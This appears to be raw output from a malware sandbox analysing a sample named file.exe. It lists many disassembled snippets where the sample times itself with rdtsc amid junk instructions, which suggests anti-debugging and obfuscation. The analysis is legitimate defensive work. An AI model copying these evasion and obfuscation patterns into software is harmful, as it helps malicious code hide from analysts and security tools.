                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11346C7 second address: 11346E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007FFAC0BDB466h 0x0000000b jmp 00007FFAC0BDB46Ah 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push ecx 0x00000014 jl 00007FFAC0BDB466h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134C47 second address: 1134C88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684466h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FFAC1684463h 0x00000010 pop edx 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jne 00007FFAC1684456h 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1139961 second address: 1139974 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FFAC0BDB466h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113D69C second address: 113D6A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11442B5 second address: 11442BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11442BE second address: 11442CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FFAC1684456h 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11445C0 second address: 11445C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11445C6 second address: 11445F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FFAC1684461h 0x0000000d js 00007FFAC1684456h 0x00000013 jmp 00007FFAC168445Dh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11445F7 second address: 11445FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144BD3 second address: 1144BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FFAC1684456h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144ED3 second address: 1144EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114520E second address: 1145226 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAC1684456h 0x00000008 jmp 00007FFAC168445Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11457D0 second address: 11457DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFAC0BDB466h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145A46 second address: 1145A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145A4A second address: 1145A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145A4E second address: 1145AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAC168445Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FFAC168445Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push esi 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007FFAC1684466h 0x0000001d pop esi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFAC168445Dh 0x00000028 jmp 00007FFAC168445Bh 0x0000002d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145AA4 second address: 1145AAE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAC0BDB466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145AAE second address: 1145AB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145DDF second address: 1145DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114609F second address: 11460A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11460A5 second address: 11460A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FC0D second address: 114FC25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Eh 0x00000007 ja 00007FFAC1684456h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A3D6 second address: 109A3EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FFAC0BDB46Ch 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A3EF second address: 109A405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FFAC1684456h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A405 second address: 109A41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFAC0BDB46Fh 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A41B second address: 109A423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EE00 second address: 114EE04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114EF72 second address: 114EF7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007FFAC1684456h 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F334 second address: 114F33F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F33F second address: 114F345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F345 second address: 114F35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FFAC0BDB468h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FFAC0BDB46Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F35D second address: 114F365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F365 second address: 114F36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFAC0BDB466h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F36F second address: 114F3A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC1684468h 0x00000007 jmp 00007FFAC1684467h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F77D second address: 114F781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114F937 second address: 114F979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 jc 00007FFAC1684456h 0x0000000c jmp 00007FFAC1684464h 0x00000011 jmp 00007FFAC1684462h 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FFAC168445Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115754C second address: 1157556 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAC0BDB466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11579AE second address: 11579B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157B21 second address: 1157B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAC0BDB475h 0x00000009 jmp 00007FFAC0BDB471h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FFAC0BDB466h 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1157B56 second address: 1157BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAC168445Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FFAC1684468h 0x00000010 pushad 0x00000011 je 00007FFAC1684456h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jmp 00007FFAC1684464h 0x0000001e popad 0x0000001f push esi 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11581B7 second address: 11581E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FFAC0BDB478h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11581E0 second address: 11581E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1158A68 second address: 1158A75 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAC0BDB468h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1158A75 second address: 1158A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAC168445Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115917C second address: 1159181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1156F66 second address: 1156F81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FFAC1684489h 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1160684 second address: 11606AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 jbe 00007FFAC0BDB485h 0x0000000e jmp 00007FFAC0BDB479h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11666E8 second address: 11666F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAC1684456h 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11666F2 second address: 1166722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB46Ch 0x00000007 jmp 00007FFAC0BDB475h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f ja 00007FFAC0BDB466h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166722 second address: 1166728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1166728 second address: 1166732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171A47 second address: 1171A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FFAC168445Eh 0x0000000b ja 00007FFAC1684456h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 jc 00007FFAC1684456h 0x0000001a jmp 00007FFAC1684460h 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007FFAC1684462h 0x00000026 jns 00007FFAC1684456h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171A8D second address: 1171A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jo 00007FFAC0BDB489h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171A9D second address: 1171AAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC168445Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171450 second address: 1171474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FFAC0BDB478h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1171474 second address: 1171481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FFAC168445Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11715E2 second address: 117160D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FFAC0BDB46Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11739F8 second address: 11739FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180C25 second address: 1180C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1180C2C second address: 1180C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185544 second address: 1185559 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAC0BDB471h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5E8F second address: 10A5EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFAC1684458h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFAC1684460h 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185366 second address: 1185381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFAC0BDB470h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185381 second address: 118539D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FFAC1684456h 0x00000009 jmp 00007FFAC168445Bh 0x0000000e jng 00007FFAC1684456h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118AD46 second address: 118AD52 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118B066 second address: 118B082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAC1684468h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192DA0 second address: 1192DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007FFAC0BDB46Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1654 second address: 11B1663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAC168445Bh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1194 second address: 11B1198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B1198 second address: 11B11AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFAC1684460h 0x0000000b rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B12F0 second address: 11B12F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B12F7 second address: 11B12FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B12FD second address: 11B1301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB448 second address: 11CB44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB44C second address: 11CB450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB450 second address: 11CB47F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFAC1684461h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFAC1684464h 0x00000014 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CA34A second address: 11CA35F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFAC0BDB466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FFAC0BDB466h 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CA602 second address: 11CA638 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAC1684458h 0x00000008 jne 00007FFAC1684463h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007FFAC1684462h 0x0000001a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CABEE second address: 11CABF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CABF8 second address: 11CABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB151 second address: 11CB159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB159 second address: 11CB15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCDBA second address: 11CCDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCDBE second address: 11CCDD9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAC1684456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFAC168445Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF715 second address: 11CF71A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF9B8 second address: 11CF9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF9BC second address: 11CFA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FFAC0BDB466h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 js 00007FFAC0BDB46Eh 0x00000018 jl 00007FFAC0BDB468h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jmp 00007FFAC0BDB46Bh 0x00000029 mov eax, dword ptr [eax] 0x0000002b jl 00007FFAC0BDB481h 0x00000031 pushad 0x00000032 push ecx 0x00000033 pop ecx 0x00000034 jmp 00007FFAC0BDB477h 0x00000039 popad 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jmp 00007FFAC0BDB473h 0x00000046 push edi 0x00000047 pop edi 0x00000048 popad 0x00000049 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFCF9 second address: 11CFD7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FFAC1684458h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov edx, dword ptr [ebp+122D1FB7h] 0x00000027 push dword ptr [ebp+122D1EAAh] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FFAC1684458h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 jmp 00007FFAC168445Bh 0x0000004c call 00007FFAC1684459h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FFAC1684463h 0x00000058 rdtsc
                            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CFD7C second address: 11CFD82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
